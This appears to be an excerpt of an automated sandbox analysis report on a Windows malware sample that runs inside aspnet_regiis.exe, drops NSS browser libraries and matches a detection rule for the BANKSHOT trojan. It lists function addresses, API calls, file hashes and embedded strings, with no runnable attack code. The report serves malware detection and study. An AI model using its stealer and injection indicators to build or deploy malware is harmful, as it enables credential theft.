                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CACB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6CACB910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6CA6F280
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B80E00_2_6D5B80E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5BA4E00_2_6D5BA4E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5BABD00_2_6D5BABD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D9D150_2_6D5D9D15
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B45100_2_6D5B4510
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C81100_2_6D5C8110
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C71100_2_6D5C7110
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B5D000_2_6D5B5D00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CC9000_2_6D5CC900
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5BA9F00_2_6D5BA9F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C4D900_2_6D5C4D90
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C3D800_2_6D5C3D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C78500_2_6D5C7850
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C5C500_2_6D5C5C50
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C38700_2_6D5C3870
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C50600_2_6D5C5060
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C40600_2_6D5C4060
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C2C000_2_6D5C2C00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CA0300_2_6D5CA030
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C7C200_2_6D5C7C20
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C28D00_2_6D5C28D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B4CF00_2_6D5B4CF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C68F00_2_6D5C68F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B98E00_2_6D5B98E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C8C800_2_6D5C8C80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C5F500_2_6D5C5F50
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B2B700_2_6D5B2B70
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B33700_2_6D5B3370
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C6B600_2_6D5C6B60
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C43600_2_6D5C4360
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C4B000_2_6D5C4B00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C33300_2_6D5C3330
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C2FC00_2_6D5C2FC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B3FE00_2_6D5B3FE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C97900_2_6D5C9790
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C53B00_2_6D5C53B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C87A00_2_6D5C87A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CC2500_2_6D5CC250
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5B5A400_2_6D5B5A40
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CC6200_2_6D5CC620
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C7EC00_2_6D5C7EC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5C22C00_2_6D5C22C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1C4723_2_02A1C472
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2D1C33_2_02A2D1C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2D9333_2_02A2D933
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1B7123_2_02A1B712
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2CD2E3_2_02A2CD2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1950A3_2_02A1950A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2DD1B3_2_02A2DD1B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2D5613_2_02A2D561
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA635A03_2_6CA635A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC34A03_2_6CAC34A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CACC4A03_2_6CACC4A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA76C803_2_6CA76C80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6D4E03_2_6CA6D4E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA6CF03_2_6CAA6CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA764C03_2_6CA764C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8D4D03_2_6CA8D4D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD542B3_2_6CAD542B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CADAC003_2_6CADAC00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA5C103_2_6CAA5C10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB2C103_2_6CAB2C10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA754403_2_6CA75440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD545C3_2_6CAD545C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC85F03_2_6CAC85F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA0DD03_2_6CAA0DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7FD003_2_6CA7FD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8ED103_2_6CA8ED10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA905123_2_6CA90512
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC4EA03_2_6CAC4EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CACE6803_2_6CACE680
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA85E903_2_6CA85E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD76E33_2_6CAD76E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6BEF03_2_6CA6BEF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7FEF03_2_6CA7FEF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC9E303_2_6CAC9E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB56003_2_6CAB5600
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA7E103_2_6CAA7E10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD6E633_2_6CAD6E63
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6C6703_2_6CA6C670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB2E4E3_2_6CAB2E4E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA846403_2_6CA84640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA89E503_2_6CA89E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA3E503_2_6CAA3E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB77A03_2_6CAB77A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6DFE03_2_6CA6DFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA96FF03_2_6CA96FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA79F003_2_6CA79F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA77103_2_6CAA7710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA960A03_2_6CA960A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8C0E03_2_6CA8C0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA58E03_2_6CAA58E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD50C73_2_6CAD50C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAB8203_2_6CAAB820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB48203_2_6CAB4820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA778103_2_6CA77810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAF0703_2_6CAAF070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA888503_2_6CA88850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8D8503_2_6CA8D850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6C9A03_2_6CA6C9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9D9B03_2_6CA9D9B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA51903_2_6CAA5190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC29903_2_6CAC2990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7D9603_2_6CA7D960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CABB9703_2_6CABB970
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CADB1703_2_6CADB170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8A9403_2_6CA8A940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA622A03_2_6CA622A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA94AA03_2_6CA94AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7CAB03_2_6CA7CAB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD2AB03_2_6CAD2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CADBA903_2_6CADBA90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA81AF03_2_6CA81AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAE2F03_2_6CAAE2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA8AC03_2_6CAA8AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA9A603_2_6CAA9A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6F3803_2_6CA6F380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD53C83_2_6CAD53C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAD3203_2_6CAAD320
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7C3703_2_6CA7C370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA653403_2_6CA65340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB6ECD03_2_6CB6ECD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB0ECC03_2_6CB0ECC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBEAC303_2_6CBEAC30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBD6C003_2_6CBD6C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB1AC603_2_6CB1AC60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB14DB03_2_6CB14DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9CDC03_2_6CC9CDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBA6D903_2_6CBA6D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3AD503_2_6CC3AD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBDED703_2_6CBDED70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC98D203_2_6CC98D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB96E903_2_6CB96E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB1AEC03_2_6CB1AEC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBB0EC03_2_6CBB0EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBF0E203_2_6CBF0E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBAEE703_2_6CBAEE70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB1EFB03_2_6CB1EFB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBEEFF03_2_6CBEEFF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB10FE03_2_6CB10FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC58FB03_2_6CC58FB0
                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6D5CDB80 appears 33 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CAA94D0 appears 90 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02A047E8 appears 38 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CA9CBE8 appears 134 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02A10609 appears 71 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02A104E7 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CC909D0 appears 37 times
                      Source: file.exeStatic PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.1421898994.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000000.1407332677.0000000000C44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: file.exeStatic PE information: Section: JO_E58 ZLIB complexity 1.0003312317251463
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/26@1/3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6CAC7030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_02A114A5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A11807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,RtlAllocateHeap,wsprintfA,VariantClear,3_2_02A11807
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
